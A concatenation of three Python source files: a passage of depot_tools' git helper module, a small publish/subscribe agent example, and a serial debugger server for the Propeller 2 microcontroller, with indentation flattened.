git config %s <new_limit>
You may also try cleaning up your old branches by running:
git cl archive
""", num, limit, key)
for line in raw_branches:
if line.startswith(NO_BRANCH):
continue
yield line.split()[-1]
def get_config(option, default=None):
try:
return run('config', '--get', option) or default
except subprocess2.CalledProcessError:
return default
def get_config_int(option, default=0):
assert isinstance(default, int)
try:
return int(get_config(option, default))
except ValueError:
return default
def get_config_list(option):
try:
return run('config', '--get-all', option).split()
except subprocess2.CalledProcessError:
return []
def get_config_regexp(pattern):
if IS_WIN: # pragma: no cover
# this madness is because we call git.bat which calls git.exe which calls
# bash.exe (or something to that effect). Each layer divides the number of
# ^'s by 2.
pattern = pattern.replace('^', '^' * 8)
return run('config', '--get-regexp', pattern).splitlines()
def current_branch():
try:
return run('rev-parse', '--abbrev-ref', 'HEAD')
except subprocess2.CalledProcessError:
return None
def del_branch_config(branch, option, scope='local'):
del_config('branch.%s.%s' % (branch, option), scope=scope)
def del_config(option, scope='local'):
try:
run('config', '--' + scope, '--unset', option)
except subprocess2.CalledProcessError:
pass
def diff(oldrev, newrev, *args):
return run('diff', oldrev, newrev, *args)
def freeze():
took_action = False
key = 'depot-tools.freeze-size-limit'
MB = 2**20
limit_mb = get_config_int(key, 100)
untracked_bytes = 0
for f, s in status():
if is_unmerged(s):
die("Cannot freeze unmerged changes!")
if limit_mb > 0:
if s.lstat == '?':
untracked_bytes += os.stat(f).st_size
if untracked_bytes > limit_mb * MB:
die("""\
You appear to have too much untracked+unignored data in your git
checkout: %.1f / %d MB.
Run `git status` to see what it is.
In addition to making many git commands slower, this will prevent
depot_tools from freezing your in-progress changes.
You should add untracked data that you want to ignore to your repo's
.git/info/exclude
file. See `git help ignore` for the format of this file.
If this data is intended as part of your commit, you may adjust the
freeze limit by running:
git config %s <new_limit>
Where <new_limit> is an integer threshold in megabytes.""",
untracked_bytes / (MB * 1.0), limit_mb, key)
try:
run('commit', '--no-verify', '-m', FREEZE + '.indexed')
took_action = True
except subprocess2.CalledProcessError:
pass
try:
run('add', '-A')
run('commit', '--no-verify', '-m', FREEZE + '.unindexed')
took_action = True
except subprocess2.CalledProcessError:
pass
if not took_action:
return 'Nothing to freeze.'
def get_branch_tree():
"""Get the dictionary of {branch: parent}, compatible with topo_iter.
Returns a tuple of (skipped, <branch_tree dict>) where skipped is a set of
branches without upstream branches defined.
"""
skipped = set()
branch_tree = {}
for branch in branches():
parent = upstream(branch)
if not parent:
skipped.add(branch)
continue
branch_tree[branch] = parent
return skipped, branch_tree
def get_or_create_merge_base(branch, parent=None):
"""Finds the configured merge base for branch.
If parent is supplied, it's used instead of calling upstream(branch).
"""
base = branch_config(branch, 'base')
base_upstream = branch_config(branch, 'base-upstream')
parent = parent or upstream(branch)
if parent is None or branch is None:
return None
actual_merge_base = run('merge-base', parent, branch)
if base_upstream != parent:
base = None
base_upstream = None
def is_ancestor(a, b):
return run_with_retcode('merge-base', '--is-ancestor', a, b) == 0
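# A cached base is only kept if it is still an ancestor of the branch and is
# not already behind the actual merge-base; otherwise it is discarded and
# recomputed below.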
if base and base != actual_merge_base:
if not is_ancestor(base, branch):
logging.debug('Found WRONG pre-set merge-base for %s: %s', branch, base)
base = None
elif is_ancestor(base, actual_merge_base):
logging.debug('Found OLD pre-set merge-base for %s: %s', branch, base)
base = None
else:
logging.debug('Found pre-set merge-base for %s: %s', branch, base)
if not base:
base = actual_merge_base
manual_merge_base(branch, base, parent)
return base
def hash_multi(*reflike):
return run('rev-parse', *reflike).splitlines()
def hash_one(reflike, short=False):
args = ['rev-parse', reflike]
if short:
args.insert(1, '--short')
return run(*args)
def in_rebase():
git_dir = run('rev-parse', '--git-dir')
return (
os.path.exists(os.path.join(git_dir, 'rebase-merge')) or
os.path.exists(os.path.join(git_dir, 'rebase-apply')))
def intern_f(f, kind='blob'):
"""Interns a file object into the git object store.
Args:
f (file-like object) - The file-like object to intern
kind (git object type) - One of 'blob', 'commit', 'tree', 'tag'.
Returns the git hash of the interned object (hex encoded).
"""
ret = run('hash-object', '-t', kind, '-w', '--stdin', stdin=f)
f.close()
return ret
def is_dormant(branch):
# TODO(iannucci): Do an oldness check?
return branch_config(branch, 'dormant', 'false') != 'false'
def is_unmerged(stat_value):
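# Unmerged when either side of the index reports 'U', or when both sides agree
# on 'A' (both added) or 'D' (both deleted), i.e. the conflict states that
# git-status reports.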
return (
'U' in (stat_value.lstat, stat_value.rstat) or
((stat_value.lstat == stat_value.rstat) and stat_value.lstat in 'AD')
)
def manual_merge_base(branch, base, parent):
set_branch_config(branch, 'base', base)
set_branch_config(branch, 'base-upstream', parent)
def mktree(treedict):
"""Makes a git tree object and returns its hash.
See |tree()| for the values of mode, type, and ref.
Args:
treedict - { name: (mode, type, ref) }
"""
with tempfile.TemporaryFile() as f:
for name, (mode, typ, ref) in treedict.iteritems():
f.write('%s %s %s\t%s\0' % (mode, typ, ref, name))
f.seek(0)
return run('mktree', '-z', stdin=f)
def parse_commitrefs(*commitrefs):
"""Returns binary encoded commit hashes for one or more commitrefs.
A commitref is anything which can resolve to a commit. Popular examples:
* 'HEAD'
* 'origin/master'
* 'cool_branch~2'
"""
try:
return map(binascii.unhexlify, hash_multi(*commitrefs))
except subprocess2.CalledProcessError:
raise BadCommitRefException(commitrefs)
RebaseRet = collections.namedtuple('RebaseRet', 'success stdout stderr')
def rebase(parent, start, branch, abort=False):
"""Rebases |start|..|branch| onto the branch |parent|.
Args:
parent - The new parent ref for the rebased commits.
start - The commit to start from
branch - The branch to rebase
abort - If True, will call git-rebase --abort in the event that the rebase
doesn't complete successfully.
Returns a namedtuple with fields:
success - a boolean indicating that the rebase command completed
successfully.
stdout, stderr - if the rebase failed, these contain the output of the
failed rebase.
"""
try:
args = ['--onto', parent, start, branch]
if TEST_MODE:
args.insert(0, '--committer-date-is-author-date')
run('rebase', *args)
return RebaseRet(True, '', '')
except subprocess2.CalledProcessError as cpe:
if abort:
run_with_retcode('rebase', '--abort') # ignore failure
return RebaseRet(False, cpe.stdout, cpe.stderr)
def remove_merge_base(branch):
del_branch_config(branch, 'base')
del_branch_config(branch, 'base-upstream')
def repo_root():
"""Returns the absolute path to the repository root."""
return run('rev-parse', '--show-toplevel')
def root():
return get_config('depot-tools.upstream', 'origin/master')
@contextlib.contextmanager
def less(): # pragma: no cover
"""Runs 'less' as context manager yielding its stdin as a PIPE.
Automatically checks if sys.stdout is a non-TTY stream. If so, it avoids
running less and just yields sys.stdout.
"""
if not setup_color.IS_TTY:
yield sys.stdout
return
# Run with the same options that git uses (see setup_pager in git repo).
# -F: Automatically quit if the output is less than one screen.
# -R: Don't escape ANSI color codes.
# -X: Don't clear the screen before starting.
cmd = ('less', '-FRX')
try:
proc = subprocess2.Popen(cmd, stdin=subprocess2.PIPE)
yield proc.stdin
finally:
proc.stdin.close()
proc.wait()
def run(*cmd, **kwargs):
"""The same as run_with_stderr, except it only returns stdout."""
return run_with_stderr(*cmd, **kwargs)[0]
def run_with_retcode(*cmd, **kwargs):
"""Run a command but only return the status code."""
try:
run(*cmd, **kwargs)
return 0
except subprocess2.CalledProcessError as cpe:
return cpe.returncode
def run_stream(*cmd, **kwargs):
"""Runs a git command. Returns stdout as a PIPE (file-like object).
stderr is dropped to avoid races if the process outputs to both stdout and
stderr.
"""
kwargs.setdefault('stderr', subprocess2.VOID)
kwargs.setdefault('stdout', subprocess2.PIPE)
kwargs.setdefault('shell', False)
cmd = (GIT_EXE, '-c', 'color.ui=never') + cmd
proc = subprocess2.Popen(cmd, **kwargs)
return proc.stdout
@contextlib.contextmanager
def run_stream_with_retcode(*cmd, **kwargs):
"""Runs a git command as context manager yielding stdout as a PIPE.
stderr is dropped to avoid races if the process outputs to both stdout and
stderr.
Raises subprocess2.CalledProcessError on nonzero return code.
"""
kwargs.setdefault('stderr', subprocess2.VOID)
kwargs.setdefault('stdout', subprocess2.PIPE)
kwargs.setdefault('shell', False)
cmd = (GIT_EXE, '-c', 'color.ui=never') + cmd
try:
proc = subprocess2.Popen(cmd, **kwargs)
yield proc.stdout
finally:
retcode = proc.wait()
if retcode != 0:
raise subprocess2.CalledProcessError(retcode, cmd, os.getcwd(),
None, None)
def run_with_stderr(*cmd, **kwargs):
"""Runs a git command.
Returns (stdout, stderr) as a pair of strings.
kwargs
autostrip (bool) - Strip the output. Defaults to True.
indata (str) - Specifies stdin data for the process.
"""
kwargs.setdefault('stdin', subprocess2.PIPE)
kwargs.setdefault('stdout', subprocess2.PIPE)
kwargs.setdefault('stderr', subprocess2.PIPE)
kwargs.setdefault('shell', False)
autostrip = kwargs.pop('autostrip', True)
indata = kwargs.pop('indata', None)
cmd = (GIT_EXE, '-c', 'color.ui=never') + cmd
proc = subprocess2.Popen(cmd, **kwargs)
ret, err = proc.communicate(indata)
retcode = proc.wait()
if retcode != 0:
raise subprocess2.CalledProcessError(retcode, cmd, os.getcwd(), ret, err)
if autostrip:
ret = (ret or '').strip()
err = (err or '').strip()
return ret, err
def set_branch_config(branch, option, value, scope='local'):
set_config('branch.%s.%s' % (branch, option), value, scope=scope)
def set_config(option, value, scope='local'):
run('config', '--' + scope, option, value)
def get_dirty_files():
# Make sure index is up-to-date before running diff-index.
run_with_retcode('update-index', '--refresh', '-q')
return run('diff-index', '--name-status', 'HEAD')
def is_dirty_git_tree(cmd):
dirty = get_dirty_files()
if dirty:
print 'Cannot %s with a dirty tree. You must commit locally first.' % cmd
print 'Uncommitted files: (git diff-index --name-status HEAD)'
print dirty[:4096]
if len(dirty) > 4096: # pragma: no cover
print '... (run "git diff-index --name-status HEAD" to see full output).'
return True
return False
def status():
"""Returns a parsed version of git-status.
Returns a generator of (current_name, (lstat, rstat, src)) pairs where:
* current_name is the name of the file
* lstat is the left status code letter from git-status
* rstat is the right status code letter from git-status
* src is the current name of the file, or the original name of the file
if lstat == 'R'
"""
stat_entry = collections.namedtuple('stat_entry', 'lstat rstat src')
def tokenizer(stream):
acc = StringIO()
c = None
while c != '':
c = stream.read(1)
if c in (None, '', '\0'):
if acc.len:
yield acc.getvalue()
acc = StringIO()
else:
acc.write(c)
def parser(tokens):
while True:
# Raises StopIteration if it runs out of tokens.
status_dest = next(tokens)
stat, dest = status_dest[:2], status_dest[3:]
lstat, rstat = stat
if lstat == 'R':
src = next(tokens)
else:
src = dest
yield (dest, stat_entry(lstat, rstat, src))
return parser(tokenizer(run_stream('status', '-z', bufsize=-1)))
def squash_current_branch(header=None, merge_base=None):
header = header or 'git squash commit.'
merge_base = merge_base or get_or_create_merge_base(current_branch())
log_msg = header + '\n'
if log_msg:
log_msg += '\n'
log_msg += run('log', '--reverse', '--format=%H%n%B', '%s..HEAD' % merge_base)
run('reset', '--soft', merge_base)
if not get_dirty_files():
# Sometimes the squash can result in the same tree, meaning that there is
# nothing to commit at this point.
print 'Nothing to commit; squashed branch is empty'
return False
run('commit', '--no-verify', '-a', '-F', '-', indata=log_msg)
return True
def tags(*args):
return run('tag', *args).splitlines()
def thaw():
took_action = False
for sha in (s.strip() for s in run_stream('rev-list', 'HEAD').xreadlines()):
msg = run('show', '--format=%f%b', '-s', 'HEAD')
match = FREEZE_MATCHER.match(msg)
if not match:
if not took_action:
return 'Nothing to thaw.'
break
run('reset', '--' + FREEZE_SECTIONS[match.group(1)], sha)
took_action = True
def topo_iter(branch_tree, top_down=True):
"""Generates (branch, parent) in topographical order for a branch tree.
Given a tree:
A1
B1 B2
C1 C2 C3
D1
branch_tree would look like: {
'D1': 'C3',
'C3': 'B2',
'B2': 'A1',
'C1': 'B1',
'C2': 'B1',
'B1': 'A1',
}
It is OK to have multiple 'root' nodes in your graph.
If top_down is True, items are yielded from A->D. Otherwise they're yielded
from D->A. Within a layer the branches will be yielded in sorted order.
"""
branch_tree = branch_tree.copy()
# TODO(iannucci): There is probably a more efficient way to do these.
if top_down:
while branch_tree:
this_pass = [(b, p) for b, p in branch_tree.iteritems()
if p not in branch_tree]
assert this_pass, "Branch tree has cycles: %r" % branch_tree
for branch, parent in sorted(this_pass):
yield branch, parent
del branch_tree[branch]
else:
parent_to_branches = collections.defaultdict(set)
for branch, parent in branch_tree.iteritems():
parent_to_branches[parent].add(branch)
while branch_tree:
this_pass = [(b, p) for b, p in branch_tree.iteritems()
if not parent_to_branches[b]]
assert this_pass, "Branch tree has cycles: %r" % branch_tree
for branch, parent in sorted(this_pass):
yield branch, parent
parent_to_branches[parent].discard(branch)
del branch_tree[branch]
def tree(treeref, recurse=False):
"""Returns a dict representation of a git tree object.
Args:
treeref (str) - a git ref which resolves to a tree (commits count as trees).
recurse (bool) - include all of the tree's descendants too. File names will
take the form of 'some/path/to/file'.
Return format:
{ 'file_name': (mode, type, ref) }
mode is an integer where:
* 0040000 - Directory
* 0100644 - Regular non-executable file
* 0100664 - Regular non-executable group-writeable file
* 0100755 - Regular executable file
* 0120000 - Symbolic link
* 0160000 - Gitlink
type is a string where it's one of 'blob', 'commit', 'tree', 'tag'.
ref is the hex encoded hash of the entry.
"""
ret = {}
opts = ['ls-tree', '--full-tree']
if recurse:
opts.append('-r')
opts.append(treeref)
try:
for line in run(*opts).splitlines():
mode, typ, ref, name = line.split(None, 3)
ret[name] = (mode, typ, ref)
except subprocess2.CalledProcessError:
return None
return ret
def upstream(branch):
try:
return run('rev-parse', '--abbrev-ref', '--symbolic-full-name',
branch+'@{upstream}')
except subprocess2.CalledProcessError:
return None
def get_git_version():
"""Returns a tuple that contains the numeric components of the current git
version."""
version_string = run('--version')
version_match = re.search(r'(\d+\.)+(\d+)', version_string)
version = version_match.group() if version_match else ''
return tuple(int(x) for x in version.split('.'))
def get_branches_info(include_tracking_status):
format_string = (
'--format=%(refname:short):%(objectname:short):%(upstream:short):')
# This is not covered by the depot_tools CQ which only has git version 1.8.
if (include_tracking_status and
get_git_version() >= MIN_UPSTREAM_TRACK_GIT_VERSION): # pragma: no cover
format_string += '%(upstream:track)'
info_map = {}
data = run('for-each-ref', format_string, 'refs/heads')
BranchesInfo = collections.namedtuple(
'BranchesInfo', 'hash upstream ahead behind')
for line in data.splitlines():
(branch, branch_hash, upstream_branch, tracking_status) = line.split(':')
ahead_match = re.search(r'ahead (\d+)', tracking_status)
ahead = int(ahead_match.group(1)) if ahead_match else None
behind_match = re.search(r'behind (\d+)', tracking_status)
behind = int(behind_match.group(1)) if behind_match else None
info_map[branch] = BranchesInfo(
hash=branch_hash, upstream=upstream_branch, ahead=ahead, behind=behind)
# Set None for upstreams which are not branches (e.g. empty upstream, remotes
# and deleted upstream branches).
missing_upstreams = {}
for info in info_map.values():
if info.upstream not in info_map and info.upstream not in missing_upstreams:
missing_upstreams[info.upstream] = None
return dict(info_map.items() + missing_upstreams.items())
def make_workdir_common(repository, new_workdir, files_to_symlink,
files_to_copy, symlink=None):
if not symlink:
symlink = os.symlink
os.makedirs(new_workdir)
for entry in files_to_symlink:
clone_file(repository, new_workdir, entry, symlink)
for entry in files_to_copy:
clone_file(repository, new_workdir, entry, shutil.copy)
def make_workdir(repository, new_workdir):
GIT_DIRECTORY_WHITELIST = [
'config',
'info',
'hooks',
'logs/refs',
'objects',
'packed-refs',
'refs',
'remotes',
'rr-cache',
'svn'
]
make_workdir_common(repository, new_workdir, GIT_DIRECTORY_WHITELIST,
['HEAD'])
def clone_file(repository, new_workdir, link, operation):
if not os.path.exists(os.path.join(repository, link)):
return
link_dir = os.path.dirname(os.path.join(new_workdir, link))
if not os.path.exists(link_dir):
os.makedirs(link_dir)
operation(os.path.join(repository, link), os.path.join(new_workdir, link))
notifications.py
import threading
import time
from signal import SIGINT, SIGTERM, signal
from agents import Agent, Message
class NotificationBroker(Agent):
def setup(self, name=None, pub_address=None, sub_address=None):
self.create_notification_broker(pub_address, sub_address)
class Sender(Agent):
def setup(self, name=None, pub_address=None, sub_address=None):
self.counter = 0
self.pub, self.sub = self.create_notification_client(pub_address, sub_address)
# begin sending forever, add to managed threads for graceful cleanup
t = threading.Thread(target=self.send_forever)
self.threads.append(t)
t.start()
def send_forever(self):
# use the exit event to leave the loop so the thread can shut down gracefully
while not self.exit_event.is_set():
time.sleep(1)
self.counter += 1
msg = Message.Notification(payload=str(self.counter))
self.log.info(f"publishing: {msg}")
self.pub.send(msg.to_multipart())
class Listener(Agent):
def setup(self, name=None, pub_address=None, sub_address=None):
self.pub, self.sub = self.create_notification_client(pub_address, sub_address)
self.disposables.append(
self.sub.observable.subscribe(lambda x: self.log.info(f"received: {x}"))
)
if __name__ == "__main__":
broker = NotificationBroker(
name="broker",
pub_address="tcp://0.0.0.0:5000",
sub_address="tcp://0.0.0.0:5001",
)
sender = Sender(
name="sender",
pub_address="tcp://0.0.0.0:5000",
sub_address="tcp://0.0.0.0:5001",
)
listener = Listener(
name="listener",
pub_address="tcp://0.0.0.0:5000",
sub_address="tcp://0.0.0.0:5001",
)
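# All three agents are given the same pair of endpoints; the broker is
# expected to bridge them so that the sender's publications reach the
# listener's subscription.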
# override shutdown signals
def shutdown(signum, frame):
sender.shutdown()
listener.shutdown()
broker.shutdown()
signal(SIGTERM, shutdown)
signal(SIGINT, shutdown)
p2db_server.py
import threading
import time
import io
import serial
import queue
from . import p2info
from . import p2tools
import logging
log = logging.getLogger('main')
class CogState:
DISCONNECTED = 0 # this cog has not been seen and we can't talk to it
IDLE = 1 # this cog is idle and ready to accept data
EXECUTING = 2 # this cog is executing code
def __init__(self, cog_num):
self.status = None
self.cog = cog_num
self.state = CogState.DISCONNECTED
def update_status(self, stat):
self.status = stat
self.state = CogState.IDLE
def get_state(self):
return self.state
class CogPacket():
UNKNOWN = 0
STATUS = 1
HUBBYTE = 2
REG = 3
type_dict = {
UNKNOWN: "unknown",
STATUS: "status",
HUBBYTE: "hub byte",
REG: "register"
}
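# Expected payload size in bytes for each response id byte:
# 'g' -> 20 (status), 'r' -> 4 (register), 'h' -> 1 (hub byte).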
def get_response_size(c):
if (c == b'g'):
return 20
if (c == b'r'):
return 4
if (c == b'h'):
return 1
return 0
def __init__(self, dat) -> None:
self.bytes = dat
self.cog = int.from_bytes(dat[1:2], 'little')
self.msgid = dat[0:1]
self.raw = dat[2:]
if self.msgid == b'h':
self.value = int.from_bytes(self.raw, 'little')
self.type = CogPacket.HUBBYTE
elif self.msgid == b'r':
self.value = int.from_bytes(self.raw, 'little')
self.type = CogPacket.REG
elif self.msgid == b'g':
self.value = p2info.Status(self.raw, self.cog)
self.type = CogPacket.STATUS
else:
self.type = CogPacket.UNKNOWN
self.value = None
def get_value(self):
return self.value
def get_raw(self):
return self.raw
def get_bytes(self):
return self.bytes
def __str__(self) -> str:
return CogPacket.type_dict[self.type] + ": " + str(self.value) + ", " + str(self.bytes)
class P2DBServer:
'''
Responsible for communicating with a Propeller 2.
Runs a separate thread with the serial reading code and maintains the state
of the chip.
'''
GETBYTE = 1
GETREG = 2
BREAK = 3
STATUS = 4
command_dict = {
GETBYTE: b'h',
GETREG: b'r',
BREAK: b'b',
STATUS: b's'
}
def __init__(self, port):
self.cog_states = [CogState(i) for i in range(8)]
self.stat_dirty = True
self.ser = serial.Serial()
self.ser.baudrate = 2000000
self.ser.timeout = None
self.ser.port = port
self.ser.open()
self.log_queue = queue.Queue()
self.ret_addr = 0 #if we step into a function, store the return address so we can continue until the return
self.current_cog = 0
self.timeout = 2
self.ri = p2info.P2RegInfo()
self.dira = 0
self.dirb = 0
self.outa = 0
self.outb = 0
self.ina = 0
self.inb = 0
self.have_pin_data = False
'''
commands will be a dict:
{
"cmd": cmd
"timeout": if not None, expect a reponse within this many seconds
"value": value associated with comamnd (hub or reg)
"response": response packet. should be None initially and set by the server thread
}
'''
self.cmd = {
"cmd": None,
"timeout": None,
"value": None,
"response": None
}
def _set_cmd(self, cmd, value, timeout=None):
self.cmd = {
"cmd": cmd,
"timeout": timeout,
"value": value,
"response": None
}
def _wait_for_response(self):
self._wait_for_cmd_send()
self.cog_states[self.current_cog].state = CogState.EXECUTING
while(self.cmd["response"] == None):
time.sleep(0.001)
self.cog_states[self.current_cog].state = CogState.IDLE
def _wait_for_cmd_send(self):
while (self.cmd["cmd"] != None):
time.sleep(0.001)
def get_status(self):
return self.cog_states[self.current_cog].status
def load_app(self, port='', app='', verbose=False):
self.port = port
self.app = app
self.verbose = verbose
return p2tools.load(port, app, self.ser.baudrate, verbose)
def start(self):
'''
start the server
'''
log.info("Start P2DB Server...")
t = threading.Thread(target=self.server_main, daemon=True)
t.start()
def set_objdata(self, dat):
self.obj_data = dat
def update_pins(self):
_, self.dira = self.get_reg('dira')
_, self.dirb = self.get_reg('dirb')
_, self.outa = self.get_reg('outa')
_, self.outb = self.get_reg('outb')
_, self.ina = self.get_reg('ina')
_, self.inb = self.get_reg('inb')
self.have_pin_data = True
def get_byte(self, addr, raw=False):
'''
get a byte from the hub.
returns a tuple (str, int). If the string is empty, the int is the byte that was read;
if the string is non-empty, there was an error and the byte will be 0
'''
if self.cog_states[self.current_cog].get_state() == CogState.DISCONNECTED:
return ("No connection to cog " + str(self.current_cog), 0)
log.info("get byte @ " + addr)
try:
addr = int(addr, 16)
except ValueError:
return ("Invalid hub address: " + str(addr), 0)
self._set_cmd(self.GETBYTE, addr)
self._wait_for_response()
if raw:
return ("", self.cmd["response"].get_raw())
else:
return ("", self.cmd["response"].get_value())
def get_long(self, addr):
'''
get a long by reading 4 bytes
'''
if self.cog_states[self.current_cog].get_state() == CogState.DISCONNECTED:
return ("No connection to cog " + str(self.current_cog), 0)
log.info("get long @ " + addr)
try:
addr = int(addr, 16)
except ValueError:
return ("Invalid hub address: " + str(addr), 0)
dat = b''
for i in range(4):
dat = dat + self.get_byte("{:x}".format(addr + i), raw=True)[1]
return ('', int.from_bytes(dat, 'little'))
def get_reg(self, reg):
'''
get a register value. reg should be either a named register or an address
returns a tuple (str, int). The string is empty if the register was read ok,
otherwise it is an error message to print and the register value will be 0
'''
if self.cog_states[self.current_cog].get_state() == CogState.DISCONNECTED:
return ("No connection to cog " + str(self.current_cog), 0)
log.debug("get reg " + reg)
try:
addr = int(reg, 16)
except ValueError:
addr = self.ri.getRegAddr(reg)
if addr == None:
return ("Unknown register: " + str(reg) + "\n", 0)
if (addr <= 0xf):
# this range was spilled, read it from the hub instead
return self.get_long("{:x}".format(0xfff80 - 0x80*self.current_cog + 4*addr))
elif (addr >= 0xf0 and addr <= 0x1f0):
# this range was spilled, read it from the hub instead
return self.get_long(str(0xfdc00 - 0x400*self.current_cog + 4*(addr - 0xf0)))
elif (addr > 0x1ff):
# not a valid register address
return ("Invalid register address: " + str(addr) + "\nCog RAM registers address must be less than 0x200", 0)
else:
self._set_cmd(self.GETREG, addr)
self._wait_for_response()
return ("", self.cmd["response"].get_value())
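    # Illustrative note (derived from the formulas in get_reg above): for cog 0,
    # a spilled register such as 0x5 is fetched from hub address
    # 0xfff80 + 4*0x5 = 0xfff94, while register 0x100 is fetched from
    # 0xfdc00 + 4*(0x100 - 0xf0) = 0xfdc40.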
def _switch_cog_isr(self, cog):
self._set_cmd(self.STATUS, 0, self.timeout)
self._wait_for_response()
if (isinstance(self.cmd["response"], str) and self.cmd["response"] == "timeout_error"):
self.cog_states[self.current_cog].state = CogState.DISCONNECTED
return "Cog response timeout"
return ""
def continue_exec(self):
'''
        Continue execution until the cog interrupts again. Useful if async interrupts are used
'''
if self.cog_states[self.current_cog].get_state() == CogState.DISCONNECTED:
return "No connection to cog " + str(self.current_cog)
self._set_cmd(self.BREAK, 0)
self._wait_for_cmd_send()
self.cog_states[self.current_cog].state = CogState.DISCONNECTED
return ""
def step(self):
'''
step by 1 instruction. will step over function calls
returns a string with error or empty if no error
'''
if self.cog_states[self.current_cog].get_state() == CogState.DISCONNECTED:
return "No connection to cog " + str(self.current_cog)
i = p2tools.get_inst(self.obj_data, self.get_status().get_mem_pc())
if i and 'call' in i[1]:
addr = self.get_status().get_mem_pc() + 4
log.info('Stepping over call instruction...')
return self.breakpoint("{:x}".format(addr))
else:
self._set_cmd(self.BREAK, 1)
self._wait_for_cmd_send()
# switch the isr to the current cog
return self._switch_cog_isr(self.current_cog)
def stepin(self):
'''
step into a function call
return a string with error or empty if no error
'''
if self.cog_states[self.current_cog].get_state() == CogState.DISCONNECTED:
return "No connection to cog " + str(self.current_cog)
i = p2tools.get_inst(self.obj_data, self.get_status().get_mem_pc())
        if i and 'call' in i[1]:
self.ret_addr = self.get_status().get_mem_pc() + 4
log.info("Stepping into function call, return to " + str(self.ret_addr))
self._set_cmd(self.BREAK, 1)
            self._wait_for_cmd_send()
return self._switch_cog_isr(self.current_cog)
else:
return "Can't step in: not a call* instruction"
def stepout(self):
'''
step out of the current function call
'''
if self.cog_states[self.current_cog].get_state() == CogState.DISCONNECTED:
return "No connection to cog " + str(self.current_cog)
        return self.breakpoint("{:x}".format(self.ret_addr))
def breakpoint(self, addr):
if self.cog_states[self.current_cog].get_state() == CogState.DISCONNECTED:
return "No connection to cog " + str(self.current_cog)
addr = int(addr, 16)
i = p2tools.get_inst(self.obj_data, addr)
        if i and 'call' in i[1]:
self.ret_addr = addr + 4
s = self.get_status()
if s.exec_mode == 'cogex': # convert to a cog address
addr -= s.get_cog_addr()
addr /= 4
addr = int(addr)
elif s.exec_mode == 'lutex':
addr -= 0x200
addr /= 4
addr = int(addr) + 0x200
log.info("breakpoint at address " + str(addr))
self._set_cmd(self.BREAK, (addr << 12) + (1 << 10))
self._wait_for_cmd_send()
# switch the isr to the current cog
self._switch_cog_isr(self.current_cog)
return ""
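    # Worked example of the conversion above (illustrative; the cog base below is
    # an assumed value): in 'cogex' mode a hub byte address becomes a cog register
    # index, e.g. hub 0x440 with a cog base of 0x400 gives (0x440 - 0x400) // 4 = 0x10;
    # in 'lutex' mode hub 0x240 gives (0x240 - 0x200) // 4 + 0x200 = 0x210.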
def set_cog(self, cog):
self.current_cog = cog
def process_ser_data(self):
'''
process all current serial data into packets
'''
data = self.ser.read(self.ser.in_waiting)
l = len(data)
packet_buffer = b''
packets = []
if (data):
log.debug("buffer: len = {}, ".format(l) + str(data))
with io.BytesIO(data) as data_stream:
def fill_datastream():
'''
get more data into the datastream due to message fragmentation
returns the number of bytes added
'''
data_frag = self.ser.read(self.ser.in_waiting)
data_frag_l = len(data_frag)
data_stream.write(data_frag)
data_stream.seek(-data_frag_l, 2)
log.debug("added to buffer: {}".format(str(data_frag)))
return data_frag_l
while data_stream.tell() < l:
char = data_stream.read(1)
if char == b'\xdb':
log.debug("have start of message at {}".format(data_stream.tell()-1))
header = data_stream.read(2)
while (len(header) != 2):
# we know more data should come in, so keep trying to read the header
l += fill_datastream()
header += data_stream.read(2-len(header))
log.debug("have header: {}".format(str(header)))
packet_buffer += header
msg_id = header[0:1]
n = CogPacket.get_response_size(msg_id)
if (n != 0):
msg_data = data_stream.read(n)
while len(msg_data) != n:
# we know more data should come in, so keep trying to read until we fill the packet
log.debug("fragmented packet. Expecting {}, have {}".format(n, len(msg_data)))
l += fill_datastream()
msg_data += data_stream.read(n-len(msg_data))
packet_buffer += msg_data
packets.append(CogPacket(packet_buffer))
packet_buffer = b''
else:
log.error("unknown response: {}".format(msg_id))
packet_buffer = b''
else:
                    log.debug("non-debug char {} at {}".format(str(char), data_stream.tell()-1))
if (char >= b'\x80'):
self.log_queue.put(str(char))
else:
self.log_queue.put(char.decode('ascii'))
return packets
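    # Framing summary for process_ser_data (derived from the parsing above): a
    # debug packet starts with 0xdb, followed by a two-byte header whose first
    # byte is the message id; CogPacket.get_response_size(msg_id) gives the number
    # of payload bytes that complete the packet. Bytes outside a packet are
    # treated as plain log output and pushed onto log_queue.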
def send_cmd(self, command, cog, val):
'''
command: bytes object with command byte
cog: int with cog number to send to
val: int with value to send
'''
cmd = b'\xdb' + command + cog.to_bytes(1, 'little') + val.to_bytes(4, 'little')
log.debug("cmd: " + str(cmd))
self.ser.write(cmd)
def pin_updater(self):
while(1):
self.update_pins()
time.sleep(0.5)
def server_main(self):
while(1):
expect_response = None
if (self.cmd["cmd"]):
log.info("Process command: " + str(self.cmd))
if self.cmd["cmd"] == self.GETREG:
expect_response = CogPacket.REG
if self.cmd["cmd"] == self.GETBYTE:
expect_response = CogPacket.HUBBYTE
if self.cmd["cmd"] == self.STATUS:
expect_response = CogPacket.STATUS
# send the command
self.send_cmd(self.command_dict[self.cmd['cmd']], self.current_cog, self.cmd['value'])
self.cmd["cmd"] = None
done = False
timeout = self.cmd["timeout"]
t_start = time.time()
while not done:
packets = self.process_ser_data()
if packets:
self.stat_dirty = True
log.info([str(p) for p in packets])
for p in packets:
if (p.type == CogPacket.STATUS):
# because we construct a new state, we need to copy over the cog_exec address from the existing status
cog_addr_last = self.cog_states[p.cog].status.get_cog_addr() if self.cog_states[p.cog].status else -1
p.get_value().set_cog_addr(cog_addr_last)
self.cog_states[p.cog].update_status(p.get_value())
self.cmd["cmd"] = None
if (p.type == expect_response and p.cog == self.current_cog):
done = True
self.cmd["response"] = p
if timeout and time.time() > t_start + timeout:
log.warning("Cog response timeout")
self.cmd["response"] = "timeout_error"
done = True
if not expect_response:
done = True
time.sleep(0.001)
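# Minimal sketch of the command/response handshake used above (illustrative
# only, not part of the debugger): a caller fills in the command dict and polls
# "response" while a worker thread consumes the command and answers, mirroring
# _set_cmd / _wait_for_response / server_main. The worker and values below are
# hypothetical stand-ins.
if __name__ == '__main__':
    _demo_cmd = {"cmd": None, "timeout": None, "value": None, "response": None}
    def _demo_worker():
        while True:
            if _demo_cmd["cmd"] is not None:
                value = _demo_cmd["value"]
                _demo_cmd["cmd"] = None
                _demo_cmd["response"] = value + 1  # fake "register read"
            time.sleep(0.001)
    threading.Thread(target=_demo_worker, daemon=True).start()
    _demo_cmd["response"] = None
    _demo_cmd["value"] = 0x1f6
    _demo_cmd["cmd"] = "GETREG"
    while _demo_cmd["response"] is None:
        time.sleep(0.001)
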